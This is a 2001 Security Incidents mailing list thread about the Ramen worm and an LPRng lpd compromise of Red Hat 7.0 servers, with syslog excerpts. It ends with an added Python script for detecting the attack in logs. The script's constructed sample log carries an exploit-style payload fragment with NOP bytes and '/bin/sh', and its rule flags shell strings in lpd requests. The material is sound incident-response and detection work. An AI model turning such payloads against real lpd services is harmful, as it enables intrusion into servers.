Security Incidents mailing list archives

Re: Ramen worm. More details on it. (found a password and e-mails crypted inside it)


From: "Tharakan, Royans" <RTharakan () INGENUITY COM>
Date: Tue, 16 Jan 2001 19:17:25 -0800

Hi Daniel,

        I got this from one of the mailing lists about an lpd exploit for RH7.
        Maybe this is what was used by Ramen too.
        
regards,
Royans

=================================
From security () HOTCHILLI CO UK Mon Jan 15 21:01:44 2001
Date: Mon, 15 Jan 2001 13:40:13 -0000
From: Security <security () HOTCHILLI CO UK>
To: FOCUS-IH () SECURITYFOCUS COM
Subject: "lpd" - Redhat 7.0 Been Hacked

NB: For a complete message log SEE Base of email
we also have the files they installed

Hi

Not a nice weekend. Two Redhat 7.0 servers have been hacked; these were
test servers, well, one was going to be a production server but not quite
finished.

Anyway:

They got in through "lpd" printer service which "yes" on all our production
servers is disabled.

They then ran ./hack.sh and Synscan :(

Here is the error messages log - fortunately we still had access - but not
telnet or anything.

We also have all the files they installed on the box (very interesting) -
If anyone would like these please email
me - I don't want to put these on the list.

=====================================

I also noticed this:

Here is some research:

http://lwn.net/2000/0928/a/sec-lprng.php3

Jan 14 10:38:01 dns1 SERVER[26771]: Dispatch_input: bad request line
=====================================

This was a telnet approach, they used lpd (I think).

Any comments from anyone (except why was lpt running) would be useful.

regards

Tony
Hotchilli Internet

Jan 14 10:38:01 dns1 SERVER[26771]: Dispatch_input: bad request line
Jan 14 10:38:01 dns1 SERVER[26772]: Dispatch_input: bad request line
Jan 14 10:38:11 dns1 xinetd[4782]: Starting soft reconfiguration
Jan 14 10:38:12 dns1 xinetd[4782]: linuxconf disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: ntalk disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: tftp disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: exec disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: talk disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service finger
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service ftp
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service telnet
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service shell
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service login
Jan 14 10:38:12 dns1 xinetd[4782]: Reconfigured: new=1 old=5 dropped=0 (services)
Jan 14 10:38:12 dns1 modprobe: Note: /etc/modules.conf is more recent than /lib/modules/2.2.16-22/modules.dep
Jan 14 10:38:12 dns1 modprobe: modprobe: Can't locate module pø^?¿lo
Jan 14 10:38:12 dns1 modprobe: Note: /etc/modules.conf is more recent than /lib/modules/2.2.16-22/modules.dep
Jan 14 10:38:12 dns1 modprobe: modprobe: Can't locate module ^Ðø^?¿lo
Jan 14 10:38:12 dns1 kernel: synscan uses obsolete (PF_INET,SOCK_PACKET)

===================================================================



-----Original Message-----
From: Daniel Martin [mailto:dtmartin24 () HOME COM]
Sent: Tuesday, January 16, 2001 6:42 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: Re: Ramen worm. More details on it. (found a password and
e-mails crypted inside it)


Redhat 7 machines are attacked by something that appears to be aimed
at the LPRng syslog format bug, but I can't find anything out about
this tool beyond that.  Since the person making this worm forgot to
strip one of the copies of this tool that is included in the worm,
maybe someone else will fill me in on what tool this is.  In any case,
once that is achieved the same shell commands as before are executed.


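As an added illustration of what a defender could look for in this kind of log (example code written for this page, not from the thread or from any tool it mentions), the following Python scans constructed syslog lines modelled on Tony's excerpt: an LPRng "bad request line" whose payload carries non-printable bytes or "/bin/sh", followed within a short window by an xinetd reconfiguration that adds a service or a kernel synscan message. The sample lines, the 60-second window and the alert names are assumptions.

```python
"""Detect LPRng 'bad request line' attack traces and their follow-on events
in syslog.  Added example; sample log is constructed to mimic the page's
excerpt (binary payload shortened, NOP sled replaced by a few 0x90 bytes)."""
import re
from datetime import datetime

# Constructed sample log (not the original capture).
SAMPLE_LOG = (
    "Jan 14 10:38:01 dns1 SERVER[26771]: Dispatch_input: bad request line "
    "'BB\xdc\xf3\x7f\xbfXXXXXXXX000000000000\x90\x90\x90/bin/sh'\n"
    "Jan 14 10:38:11 dns1 xinetd[4782]: Starting soft reconfiguration\n"
    "Jan 14 10:38:12 dns1 xinetd[4782]: Reconfigured: new=1 old=5 dropped=0 (services)\n"
    "Jan 14 10:38:12 dns1 kernel: synscan uses obsolete (PF_INET,SOCK_PACKET)\n"
)

# "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) (\S+?)(?:\[\d+\])?: (.*)$")
BAD_REQ_RE = re.compile(r"Dispatch_input: bad request line '(.*)'$")
RECONF_RE = re.compile(r"Reconfigured: new=(\d+)")

def parse_ts(stamp, year=2001):
    """Syslog stamps carry no year; assume one (2001 matches the thread)."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def payload_is_hostile(payload):
    """A legitimate lpd request line is printable ASCII and never names a shell."""
    binary = sum(1 for c in payload if ord(c) < 0x20 or ord(c) > 0x7e)
    return binary > 0 or "/bin/sh" in payload

def find_lprng_compromise(log_text, window_seconds=60):
    """Return (host, alert) pairs: hostile bad-request lines, plus a new xinetd
    service or a synscan kernel message seen within window_seconds of one."""
    alerts, last_hit = [], None
    for line in log_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        stamp, host, prog, msg = m.groups()
        when = parse_ts(stamp)
        bad = BAD_REQ_RE.search(msg)
        if bad and payload_is_hostile(bad.group(1)):
            last_hit = when
            alerts.append((host, "lpd_overflow_attempt"))
            continue
        if last_hit is None or (when - last_hit).total_seconds() > window_seconds:
            continue
        rc = RECONF_RE.search(msg)
        if prog == "xinetd" and rc and int(rc.group(1)) > 0:
            alerts.append((host, "xinetd_new_service_after_lpd_attack"))
        elif prog == "kernel" and "synscan" in msg:
            alerts.append((host, "synscan_after_lpd_attack"))
    return alerts
```

Run against the sample it reports the attempt, the added xinetd service and the synscan load; the same reconfiguration line on its own, with no preceding hostile request, produces nothing.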